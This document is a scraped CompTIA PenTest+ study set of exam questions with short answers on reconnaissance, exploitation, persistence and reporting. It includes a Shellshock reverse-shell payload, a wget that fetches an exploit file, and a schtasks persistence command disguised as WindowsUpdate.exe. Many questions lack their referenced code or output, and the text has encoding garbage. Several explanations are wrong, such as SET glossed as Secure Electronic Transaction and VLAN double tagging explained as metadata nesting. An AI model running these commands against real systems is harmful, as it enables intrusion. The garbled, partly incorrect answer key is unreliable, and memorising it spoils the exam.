PenTest + Study
When developing a shell script intended for interpretation in Bash, the interpreter /bin/bash should be explicitly specified.Which of the following character combinations should be used on the first line of the script to accomplish this goal?
#!
A penetration tester ran a simple Python-based scanner. The following is a snippet of the code:Which of the following BEST describes why this script triggered a `probable port scan` alert in the organization's IDS?
*range(1, 1025) on line 1 populated the portList list in numerical order.
A penetration tester is conducting an authorized, physical penetration test to attempt to enter a client's building during non-business hours. Which of the following are MOST important for the penetration tester to have during the test? (Choose two.)
A dedicated point of contact at the client Knowledge of the building's normal business hours
A consultant is reviewing the following output after reports of intermittent connectivity issues:Which of the following is MOST likely to be reported by the consultant?
A device on the network has poisoned the ARP cache is the most likely issue to be reported by the consultant because it would cause the ARP cache to contain incorrect or malicious entries. ARP cache poisoning, also known as ARP spoofing, is a type of attack in which an attacker sends false ARP messages to a network, causing other devices to update their ARP caches with the attacker's false information. This allows the attacker to intercept or redirect network traffic.
A security company has been contracted to perform a scoped insider-threat assessment to try to gain access to the human resources server that houses PII and salary data. The penetration testers have been given an internal network starting position.Which of the following actions, if performed, would be ethical within the scope of the assessment?
A. Exploiting a configuration weakness in the SQL database It would be ethical within the scope of the assessment for the penetration testers to exploit a configuration weakness in the SQL database. The objective of the assessment is to gain access to the human resources server that houses PII and salary data, and exploiting a configuration weakness in the database is an appropriate action to take in order to achieve that objective.
A penetration tester runs the unshadow command on a machine.Which of the following tools will the tester most likely use NEXT?
A. John the Ripper Explanation: The unshadow command is used to combine the /etc/passwd and /etc/shadow files on a Linux or Unix system, creating a single file that contains all of the user information, including password hashes. This file can then be used to crack the passwords using a password cracking tool such as John the Ripper. John the Ripper is a popular password cracking tool that uses a variety of methods to try and guess the password, including dictionary attacks, brute force attacks, and rule-based attacks. Once the tester has the unshadowed file, they will use John the Ripper to crack the password on the machine.
A penetration tester has been contracted to review wireless security. The tester has deployed a malicious wireless AP that mimics the configuration of the target enterprise WiFi. The penetration tester now wants to try to force nearby wireless stations to connect to the malicious AP.Which of the following steps should the tester take NEXT?
A. Send deauthentication frames to the stations. After deploying a malicious wireless AP that mimics the configuration of the target enterprise WiFi, the next step for the tester should be to try to force nearby wireless stations to connect to the malicious AP. One way to accomplish this is by sending deauthentication frames to the stations. These frames will disconnect the stations from their current connection and make them available to connect to the malicious AP. This is a type of wireless man-in-the-middle (MITM) attack that can allow the tester to capture and analyze the wireless traffic of the connected stations.
Which of the following BEST describe the OWASP Top 10? (Choose two.)
A. The most critical risks of web applications C. The risks defined in order of importance
A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code: exploit = {`User-Agent`: `() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1`, `Accept`: `text/html,application/ xhtml+xml,application/xml`}Which of the following edits should the tester make to the script to determine the user context in which the server is being run?
A. exploit = {ג€User-Agentג€: ג€() { ignored;};/bin/bash -i id;whoamiג€, ג€Acceptג€: ג€text/html,application/xhtml +xml,application/xmlג€}
Which of the following assessment methods is MOST likely to cause harm to an ICS environment?
Active Scanning
Which of the following situations would MOST likely warrant revalidation of a previous security assessment?
After detection of a breach
A company has hired a penetration tester to deploy and set up a rogue access point on the network.Which of the following is the BEST tool to use to accomplish this goal?
Aircrack-NG
A company has recruited a penetration tester to conduct a vulnerability scan over the network. The test is confirmed to be on a known environment. Which of the following would be the BEST option to identify a system properly prior to performing the assessment?
Asset Inventory
Which of the following would a company's hunt team be MOST interested in seeing in a final report?
Attack TTPs
Penetration-testing activities have concluded, and the initial findings have been reviewed with the client. Which of the following best describes the NEXT step in the engagement?
Attestation of findings and delivery of the report
A penetration tester has prepared the following phishing email for an upcoming penetration test:Which of the following is the penetration tester using MOST to influence phishing targets to click on the link?
Authority and Urgency
A penetration tester recently performed a social-engineering attack in which the tester found an employee of the target company at a local coffee shop and over time built a relationship with the employee. On the employee's birthday, the tester gave the employee an external hard drive as a gift.Which of the following social-engineering attacks was the tester utilizing?
Baiting
A software company has hired a security consultant to assess the security of the company's software development practices. The consultant opts to begin reconnaissance by performing fuzzing on a software binary. Which of the following vulnerabilities is the security consultant MOST likely to identify?
Buffer overflows Fuzzing is a technique used to identify vulnerabilities in software by providing unexpected or invalid input to the software. The goal of fuzzing is to find bugs and vulnerabilities in the software by stressing its inputs and identifying unexpected behavior. One type of vulnerability that is commonly identified through fuzzing is buffer overflows. A buffer overflow occurs when a program attempts to store more data in a buffer than it can hold, which can lead to a crash or allow an attacker to execute malicious code.
A penetration tester gains access to a system and establishes persistence, and then run the following commands:Which of the following actions is the tester MOST likely performing?
C. Covering tracks by clearing the Bash history
A penetration tester has gained access to a network device that has a previously unknown IP range on an interface. Further research determines this is an always-on VPN tunnel to a third-party supplier.Which of the following is the BEST action for the penetration tester to take?
C. Stop the assessment and inform the emergency contact. The best action for the penetration tester to take after discovering the unknown IP range on the network device would be to stop the assessment and inform the emergency contact. The IP range belongs to a third-party supplier, which is likely out of scope for the assessment, and any unauthorized access or manipulation of their systems could have severe legal and financial implications.
A penetration tester is exploring a client's website. The tester performs a curl command and obtains the following:Which of the following tools would be BEST for the penetration tester to use to explore this site further?
C. WPScan WPScan is a specialized tool for performing vulnerability scanning and security assessments of WordPress-based websites. It can be used to identify vulnerabilities in WordPress core, plugins, and themes. WPScan can also be used to detect the version of the WordPress installation, which is important for identifying vulnerabilities that are specific to a particular version of WordPress.
A penetration tester would like to obtain FTP credentials by deploying a workstation as an on-path attack between the target and the server that has the FTP protocol. Which of the following methods would be the BEST to accomplish this objective?
Capture traffic using wireshark
A penetration tester is evaluating a company's network perimeter. The tester has received limited information about defensive controls or countermeasures, and limited internal knowledge of the testing exists. Which of the following should be the FIRST step to plan the reconnaissance activities?
Check WHOIS and netblock records for the company. B: Checking WHOIS and netblock records for the company is the best option to start the reconnaissance activities. WHOIS records are a good source of information to understand the scope of the network and the range of IP addresses used by the company. Netblock records, on the other hand, provide information on the Internet Service Provider (ISP) used by the company and the type of services they provide. This information can be used to identify potential vulnerabilities that can be exploited.
When preparing for an engagement with an enterprise organization, which of the following is one of the MOST important items to develop fully prior to beginning the penetration testing activities?
Clarify the SOW
A company hired a penetration-testing team to review the cyber-physical systems in a manufacturing plant. The team immediately discovered the supervisory systems and PLCs are both connected to the company intranet.Which of the following assumptions, if made by the penetration-testing team, is MOST likely to be valid?
Controllers will not validate the origin of commands Many legacy industrial control systems (ICS) and supervisory control and data acquisition (SCADA) systems are not designed with security in mind and lack basic security features such as authentication and access controls. As a result, it is common for these systems to accept commands from any source without verifying their origin. This makes them vulnerable to attacks such as command injection, which can be used to disrupt or damage the systems they control.
A penetration tester has obtained root access to a Linux-based file server and would like to maintain persistence after reboot. Which of the following techniques would BEST support this objective?
Create a one-shot system service to establish a reverse shel
A penetration tester is looking for a vulnerability that enables attackers to open doors via a specialized TCP service that is used for a physical access control system. The service exists on more than 100 different hosts, so the tester would like to automate the assessment. Identification requires the penetration tester to:✑ Have a full TCP connection✑ Send a `hello` payload✑ Wait for a response✑ Send a string of characters longer than 16 bytesWhich of the following approaches would BEST support the objective?
Create a script in the Lua language and use it with NSE.
Which of the following web-application security risks are part of the OWASP Top 10 v2017? (Choose two.)
Crossd-Site Scripting Injection flaws
In an unprotected network file repository, a penetration tester discovers a text file containing usernames and passwords in cleartext and a spreadsheet containing data for 50 employees, including full names, roles, and serial numbers. The tester realizes some of the passwords in the text file follow the format: <name- serial_number>.Which of the following would be the best action for the tester to take NEXT with this information?
D. Document the unprotected file repository as a finding in the penetration-testing report. The best action for the tester to take with this information would be to document the unprotected file repository as a finding in the penetration testing report. The tester should advise the client about the sensitive data that is exposed in the text file and the spreadsheet, including the usernames and passwords in cleartext, full names, roles, and serial numbers. By highlighting this vulnerability, the client will be able to take appropriate measures to secure their sensitive data, such as by protecting the file repository with proper access controls, implementing encryption, and putting in place a data governance policy.
A penetration tester who is doing a company-requested assessment would like to send traffic to another system suing double tagging.Which of the following techniques would BEST accomplish this goal?
D. Tag nesting Tag nesting refers to the technique of embedding one or more metadata tags within another tag. This allows for multiple layers of information to be associated with a single data element.
A penetration tester is able to capture the NTLM challenge-response traffic between a client and a server.Which of the following can be done with the pcap to gain access to the server?
D. Utilize a pass-the-hash attack. A pass-the-hash attack is a method of authenticating to a server or service by using the underlying NTLM or LANMAN hash of a user's password, instead of the actual password. The NTLM challenge-response traffic contains the hash of the password, which can be extracted and used in a pass-the-hash attack.
A penetration tester has been given an assignment to attack a series of targets in the 192.168.1.0/24 range, triggering as few alarms and countermeasures as possible.Which of the following Nmap scan syntaxes would BEST accomplish this objective?
D. nmap -sS -O 192.168.1.2/24 -T1 The best Nmap scan syntax to accomplish this objective would be to use the -sS (TCP SYN scan) option, the -O (enable OS detection) option, and the -T1 (timing option) which is the slowest timing option. The -sS option uses the SYN packet to initiate a connection, which is less likely to be detected by intrusion detection systems (IDS) and firewalls as it does not complete the full TCP connection. The -O option enables OS detection, which can help identify the type of device that is being scanned and can be useful in identifying vulnerabilities specific to that OS. The -T1 option sets the timing option to the slowest setting, this will make the scan slower, but also less likely to trigger alarms and countermeasures.
A penetration tester captured the following traffic during a web-application test:Which of the following methods should the tester use to visualize the authorization information being transmitted?
Decode the authorization header using Base64.
A company becomes concerned when the security alarms are triggered during a penetration test.Which of the following should the company do NEXT?
Deconflict with the penetration tester.
A penetration tester writes the following script: seq '1-254' ping -c 10.10.1.x.$x; Which of the following objectives is the tester attempting to achieve
Determine active hosts on the network
During a penetration test, a tester is able to change values in the URL from example.com/login.php?id=5 to example.com/login.php?id=10 and gain access to a web application. Which of the following vulnerabilities has the penetration tester exploited?
Direct Object Reference
During a penetration test, a tester is in close proximity to a corporate mobile device belonging to a network administrator that is broadcasting Bluetooth frames.Which of the following is an example of a Bluesnarfing attack that the penetration tester can perform?
Dump the user address book on the device.
A penetration tester discovered a vulnerability that provides the ability to upload to a path via discovery traversal. Some of the files that were discovered through this vulnerability are:Which of the following is the BEST method to help an attacker gain internal access to the affected machine?
Edit the smb.conf file and upload it to the server.
A new client hired a penetration-testing company for a month-long contract for various security assessments against the client's new service. The client is expecting to make the new service publicly available shortly after the assessment is complete and is planning to fix any findings, except for critical issues, after the service is made public. The client wants a simple report structure and does not want to receive daily findings.Which of the following is most important for the penetration tester to define FIRST?
Establish the threshold of risk to escalate to the client immediately
A penetration tester wants to find hidden information in documents available on the web at a particular domain. Which of the following should the penetration tester use?
FOCA FOCA (Fingerprinting Organizations with Collected Archives) is a tool that is used to find hidden information in documents available on the web. It can be used to extract metadata from documents such as PDF, Microsoft Office, OpenOffice, and others. The metadata can include information such as the author, creation date, and software used to create the document. FOCA can also extract information from the document's properties such as the title, keywords, and comments. This tool can also identify specific keywords and patterns in the document and can be useful in identifying sensitive information that may have been inadvertently left in the document.
A penetration tester is reviewing the following SOW prior to engaging with a client.`Network diagrams, logical and physical asset inventory, and employees' names are to be treated as client confidential. Upon completion of the engagement, the penetration tester will submit findings to the client's Chief Information Security Officer (CISO) via encrypted protocols and subsequently dispose of all findings by erasing them in a secure manner.`Based on the information in the SOW, which of the following behaviors would be considered unethical? (Choose two.)
Failing to share with the client critical vulnerabilities that exist within the client architecture to appease the client's senior leadership team Seeking help with the engagement in underground hacker forums by sharing the client's public IP address
A penetration tester who is conducting a vulnerability assessment discovers that ICMP is disabled on a network segment. Which of the following could be used for a denial-of-service attack on the network segment?
Fraggle
A penetration tester utilized Nmap to scan host 64.13.134.52 and received the following results:Based on the output, which of the following services are MOST likely to be exploited? (Choose two.)
HTTP: 80 DNS: 53
An Nmap scan shows open ports on web servers and databases. A penetration tester decides to run WPScan and SQLmap to identify vulnerabilities and additional information about those systems.Which of the following is the penetration tester trying to accomplish?
Identify all the vulnerabilities in the environment
A penetration tester discovers a web server that is within the scope of the engagement has already been compromised with a backdoor. Which of the following should the penetration tester do NEXT?
Inform the customer immediately about the backdoor
The following line-numbered Python code snippet is being used in reconnaissance:Which of the following line numbers from the script MOST likely contributed to the script triggering a `probable port scan` alert in the organization's IDS?
Line 08 sock.settimeout(0.1) refers to amount of time wait for server response
Which of the following provides a matrix of common tactics and techniques uses by attackers along with recommended mitigations?
MITRE ATT&CK framework
A penetration tester gains access to a system and is able to migrate to a user process:Given the output above, which of the following actions is the penetration tester performing? (Choose two.)
Mapping a share to a remote system Executing a file on the remote system
Which of the following provides an exploitation suite with payload modules that cover the broadest range of target system types?
Metasploit
A penetration tester finds a PHP script used by a web application in an unprotected internal source code repository. After reviewing the code, the tester identifies the following:Which of the following combinations of tools would the penetration tester use to exploit this script?
Netcat and cURL
Which of the following tools would be BEST suited to perform a manual web application security assessment? (Choose two.)
OWASP ZAP Burp Suite OWASP ZAP is an open-source web application security scanner and Burp Suite is a commercial product that provides a suite of web application security testing tools, including a proxy, scanner, and other features.
An Nmap network scan has found five open ports with identified services. Which of the following tools should a penetration tester use NEXT to determine if any vulnerabilities with associated exploits exist on the open ports
OpenVAS
A penetration tester completed a vulnerability scan against a web server and identified a single but severe vulnerability.Which of the following is the BEST way to ensure this is a true positive?
Perform a manual test on the server.
A penetration tester has been given eight business hours to gain access to a client's financial system.Which of the following techniques will have the HIGHEST likelihood of success?
Performing spear phishing against employees by posing as senior management
A penetration tester conducts an Nmap scan against a target and receives the following results:Which of the following should the tester use to redirect the scanning tools using TCP port 1080 on the target?
Proxy Chain
Which of the following is MOST important to include in the final report of a static application-security test that was written with a team of application developers as the intended audience?
Quantitative impact assessments given a successful software compromise
During an engagement, a penetration tester found the following list of strings inside a file:Which of the following is the BEST technique to determine the known plaintext of the strings?
Rainbow Table Attack Because they got hashes
A penetration tester downloaded the following Perl script that can be used to identify vulnerabilities in network switches. However, the script is not working properly.Which of the following changes should the tester apply to make the script work as intended?
Remove lines 3, 5, and 6.
penetration tester ran the following commands on a Windows server:Which of the following should the tester do AFTER delivering the final report?
Remove the tester-created credentials
A security firm is discussing the results of a penetration test with the client. Based on the findings, the client wants to focus the remaining time on a critical network segment. Which of the following BEST describes the action taking place?
Reprioritizing the goals/objectives
A penetration tester wants to identify CVEs that can be leveraged to gain execution on a Linux server that has an SSHD running.Which of the following would BEST support this task?
Run nmap with the --script vulners option set against the target
A Chief Information Security Officer wants a penetration tester to evaluate the security awareness level of the company's employees.Which of the following tools can help the tester achieve this goal?
SET : Secure Electronic Transaction (SET) is a system and electronic protocol to ensure the integrity and security of transactions conducted over the internet
Which of the following documents describes specific activities, deliverables, and schedules for a penetration tester?
SOW: Statement of Work
A penetration tester writes the following script:Which of the following is the tester performing?
Scanning a network for specific open ports
A penetration tester has established an on-path attack position and must now specially craft a DNS query response to be sent back to a target host.Which of the following utilities would BEST support this objective?
Scapy (Scapy is a powerful packet manipulation tool designed to craft and send custom Network Layer, Transport Layer, and Application Layer packets.)
A security firm has been hired to perform an external penetration test against a company. The only information the firm received was the company name. Which of the following passive reconnaissance approaches would be MOST likely to yield positive initial results?
Scrape web presences and social-networking sites
A penetration tester has gained access to the Chief Executive Officer's (CEO's) internal, corporate email. The next objective is to gain access to the network.Which of the following methods will MOST likely work?
Send an email from the CEO's account, requesting a new account
A company uses a cloud provider with shared network bandwidth to host a web application on dedicated servers. The company's contact with the cloud provider prevents any activities that would interfere with the cloud provider's other customers. When engaging with a penetration-testing company to test the application, which of the following should the company avoid?
Sending many web requests per second to test DDoS protection
A penetration tester has been hired to perform a physical penetration test to gain access to a secure room within a client's building. Exterior reconnaissance identifies two entrances, a WiFi guest network, and multiple security cameras connected to the Internet.Which of the following tools or techniques would BEST support additional reconnaissance?
Shodan
Which of the following tools would be MOST useful in collecting vendor and other security-relevant information for IoT devices to support passive reconnaissance?
Shodan
A penetration tester is cleaning up and covering tracks at the conclusion of a penetration test. Which of the following should the tester be sure to remove from the system?
Spawned Shells Created user accounts
A penetration tester downloaded a Java application file from a compromised web server and identifies how to invoke it by looking at the following log:Which of the following is the order of steps the penetration tester needs to follow to validate whether the Java application uses encryption over sockets?
Start a packet capture with Wireshark and then run the application.
SIMULATION -You are a penetration tester reviewing a client's website through a web browser.INSTRUCTIONS -Review all components of the website through the browser to determine if vulnerabilities are present.Remediate ONLY the highest vulnerability from either the certificate, source, or cookies.If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Step 1: Generate Certificate Signing RequestStep 2: Submit CSR to the CA -Step 3: Remove certificate from the serverStep 4: Install re-issued certificate on the server
Which of the following should a penetration tester do NEXT after identifying that an application being tested has already been compromised with malware?
Stop the assessment and inform the emergency contact.
A penetration tester was hired to perform a physical security assessment of an organization's office. After monitoring the environment for a few hours, the penetration tester notices that some employees go to lunch in a restaurant nearby and leave their belongings unattended on the table while getting food. Which of the following techniques would MOST likely be used to get legitimate access into the organization's building without raising too many alerts?
Tailgating // badge Cloning is also applicable
A consulting company is completing the ROE during scoping.Which of the following should be included in the ROE (Rules of Engagement)?
Testing restrictions
A Chief Information Security Officer wants a penetration tester to evaluate whether a recently installed firewall is protecting a subnetwork on which many decades- old legacy systems are connected. The penetration tester decides to run an OS discovery and a full port scan to identify all the systems and any potential vulnerability. Which of the following should the penetration tester consider BEFORE running a scan?
The inventory of assets and versions Before running a scan, the penetration tester should consider the inventory of assets and versions on the subnetwork. This will help the tester to identify which systems and applications are running on the network, as well as any potential vulnerabilities associated with those systems. Knowing the inventory of assets and versions will help the penetration tester to tailor the scan to the specific systems and applications on the network, which will increase the chances of identifying any potential vulnerabilities.
A penetration tester was conducting a penetration test and discovered the network traffic was no longer reaching the client's IP address. The tester later discovered the SOC had used sinkholing on the penetration tester's IP address.Which of the following MOST likely describes what happened?
The planning process failed to ensure all teams were notified.
Which of the following situations would require a penetration tester to notify the emergency contact for the engagement?
The team discovers another actor on a system on the network.
After gaining access to a previous system, a penetration tester runs an Nmap scan against a network with the following results:The tester then runs the following command from the previous exploited system, which fails:Which of the following explains the reason why the command failed?
The tester input the incorrect IP address.
A penetration tester was brute forcing an internal web server and ran a command that produced the following output:However, when the penetration tester tried to browse the URL http://172.16.100.10:3000/profile, a blank page was displayed.Which of the following is the MOST likely reason for the lack of output?
This URI returned a server error
The results of an Nmap scan are as follows:Which of the following would be the BEST conclusion about this device?
This device is most likely a gateway with in-band management services
Which of the following describes the reason why a penetration tester would run the command sdelete mimikatz. * on a Windows server that the tester compromised?
To remove the tester-created Mimikatz account
A penetration tester is explaining the MITRE ATT&CK framework to a company's chief legal counsel.Which of the following would the tester MOST likely describe as a benefit of the framework?
Understanding the tactics of a security intrusion can help disrupt them
A penetration tester is starting an assessment but only has publicly available information about the target company. The client is aware of this exercise and is preparing for the test.Which of the following describes the scope of the assessment?
Unknown environment testing
Which of the following is the MOST common vulnerability associated with IoT devices that are directly connected to the Internet?
Unsupporting OS
A red team gained access to the internal network of a client during an engagement and used the Responder tool to capture important data.Which of the following was captured by the testing team?
User hashes sent over SMB The Responder tool is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication. It can capture user hashes sent over the SMB protocol, which can be used to perform pass-the-hash attacks.
A mail service company has hired a penetration tester to conduct an enumeration of all user accounts on an SMTP server to identify whether previous staff member accounts are still active. Which of the following commands should be used to accomplish the goal?
VRFY and EXPN are the commands that should be used to accomplish the goal of enumerating all user accounts on an SMTP server. VRFY command is used to verify the existence of an email address on the SMTP server, allowing the tester to identify which email addresses are active. EXPN command is used to expand a mailing list, allowing the tester to identify which email addresses are members of a mailing list.
A company's Chief Executive Officer has created a secondary home office and is concerned that the WiFi service being used is vulnerable to an attack. A penetration tester is hired to test the security of the WiFi's router.Which of the following is MOST vulnerable to a brute-force attack?
WPS
A company hired a penetration tester to do a social-engineering test against its employees. Although the tester did not find any employees' phone numbers on the company's website, the tester has learned the complete phone catalog was published there a few months ago.In which of the following places should the penetration tester look FIRST for the employees' numbers?
Web Archive
A company obtained permission for a vulnerability scan from its cloud service provider and now wants to test the security of its hosted data.Which of the following should the tester verify FIRST to assess this risk?
Whether sensitive client data is publicly accessible
Which of the following should a penetration tester consider FIRST when engaging in a penetration test in a cloud environment?
Whether the cloud service provider allows the penetration tester to test the environment
A penetration tester receives the following results from an Nmap scan:Which of the following OSs is the target MOST likely running?
Windows Server NetBios is Windows RDP is Windows
A penetration tester received a .pcap file to look for credentials to use in an engagement.Which of the following tools should the tester utilize to open and read the .pcap file?
Wireshark Wireshark is a free and open-source packet analyzer. It is used to capture, analyze, and inspect network traffic. One of its main features is its ability to read and interpret .pcap files, which are used to store captured network traffic
A penetration tester is preparing to perform activities for a client that requires minimal disruption to company operations.Which of the following are considered passive reconnaissance tools? (Choose two.)
Wireshark Shodan
A penetration tester ran an Nmap scan on an Internet-facing network device with the -F option and found a few open ports. To further enumerate, the tester ran another scan using the following command: nmap -O -A -sS -p- 100.100.100.50Nmap returned that all 65,535 ports were filteredWhich of the following MOST likely occurred on the second scan?
a firewall or IPS blocked the scan
A penetration tester obtained the following results after scanning a web server using the dirb utility:Which of the following elements is MOST likely to contain useful information for the penetration tester?
about
When planning a penetration-testing effort, clearly expressing the rules surrounding the optimal time of day for test execution is important because:
business and network operations may be impacted
Which of the following commands will allow a penetration tester to permit a shell script to be executed by the file owner?
chmod u+x script.sh
Appending string values onto another string is called:
concatenation Concatenation is the process of appending one string value onto another string. It is a programming concept that allows developers to combine two or more strings together to create a new string. For example, you can concatenate the string "Hello " with the string "World!" to create the new string "Hello World!". This is a common operation in many programming languages, and it is often used to build dynamic strings for display or storage.
A compliance-based penetration test is primarily concerned with:
determining the efficacy of a specific set of security standards
Performing a penetration test against an environment with SCADA devices brings an additional safety risk because the:
devices may cause physical world effects
A penetration tester is conducting a penetration test. The tester obtains a root-level shell on a Linux server and discovers the following data in a file named password.txt in the /home/svsacct directory:U3VQZXIkM2NyZXQhCg==Which of the following commands should the tester use NEXT to decode the contents of the file?
echo U3VQZXIkM2NyZXQhCg== | base64 ג€"d
A security professional wants to test an IoT device by sending an invalid packet to a proprietary service listening on TCP port 3011. Which of the following would allow the security professional to easily and programmatically manipulate the TCP header length and checksum using arbitrary numbers and to observe how the proprietary service responds?
hping3. hping3 is a packet crafting tool that allows a user to easily craft and manipulate custom TCP packets, including the ability to adjust the TCP header length and checksum. It also allows the user to observe how the target responds to the custom packets.
page 12
https://www.examtopics.com/exams/comptia/pt0-002/view/12/
Page 24
https://www.examtopics.com/exams/comptia/pt0-002/view/24/
A penetration tester logs in as a user in the cloud environment of a company.Which of the following Pacu modules will enable the tester to determine the level of access of the existing user?
iam_enum_permissions
A penetration tester is conducting a penetration test and discovers a vulnerability in a webserver that is netstat -antu
investigate the high numbers of port connections
A penetration tester wrote the following script to be used in one engagement:Which of the following actions will this script perform?
look for open ports
Running a vulnerability scanner on a hybrid network segment that includes general IT servers and industrial control systems:
may cause unintended failures in control systems
A CentOS computer was exploited during a penetration test. During initial reconnaissance, the penetration tester discovered that port 25 was open on an internalSendmail server. To remain stealthy, the tester ran the following command from the attack machine:Which of the following would be the BEST command to use for further progress into the targeted network?
nc 127.0.0.1 5555 The command run by the penetration tester on the attack machine was used to establish a connection between port 5555 on the attack machine and port 25 on the internal Sendmail server at IP address 10.10.1.2. This creates a tunnel between the two machines, allowing the attack machine to access the internal network through port 5555. Therefore, to further progress into the targeted network, the best command to use would be "nc 127.0.0.1 5555" which would allow the tester to connect to the internal network through the tunnel set up on the attack machine.
A security engineer identified a new server on the network and wants to scan the host to determine if it is running an approved version of Linux and a patched version of Apache. Which of the following commands will accomplish this task?
nmap -A -T4 -p80 192.168.1.20. The nmap command is used to scan networks and hosts to determine what services and versions are running. The -A option is used to enable OS and version detection, script scanning, and traceroute. The -T4 option sets the timing of the scan to the fastest possible speed. The -p80 option indicates that only port 80 should be scanned, which is the default port for HTTP. The IP address 192.168.1.20 is the address of the server to be scanned.
A penetration tester wants to scan a target network without being detected by the client's IDS.Which of the following scans is MOST likely to avoid detection?
nmap -f --badsum 192.168.1.10
A penetration tester is scanning a corporate lab network for potentially vulnerable services.Which of the following Nmap commands will return vulnerable ports that might be interesting to a potential attacker?
nmap 192.168.1.1-5 -Ss22-25,80
An assessor wants to run an Nmap scan as quietly as possible. Which of the following commands will give the LEAST chance of detection?
nmap ג€"T0 192.168.0.1
A penetration tester who is doing a security assessment discovers that a critical vulnerability is being actively exploited by cybercriminals.Which of the following should the tester do NEXT?
reach out to PoC
A final penetration test report has been submitted to the board for review and accepted. The report has three findings rated high. Which of the following should be the NEXT step?
remediate the findings
A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized:Which of the following commands should the penetration tester run post-engagement?
rm -rf /tmp/apache
A penetration tester was able to gain access successfully to a Windows workstation on a mobile client's laptop.Which of the following can be used to ensure the tester is able to maintain access to the system?
schtasks /create /sc /ONSTART /tr C:\Temp|WindowsUpdate.exe
Which of the following expressions in Python increase a variable val by one? (Choose two.)
val=(val+1) val+=1
Which of the following expressions in Python increase a variable val by one?
val=(val+1) val+=1
A penetration tester ran the following command on a staging server: python -m SimpleHTTPServer 9891Which of the following commands could be used to download a file named exploit to a target machine for execution?
wget 10.10.51.50:9891/exploit
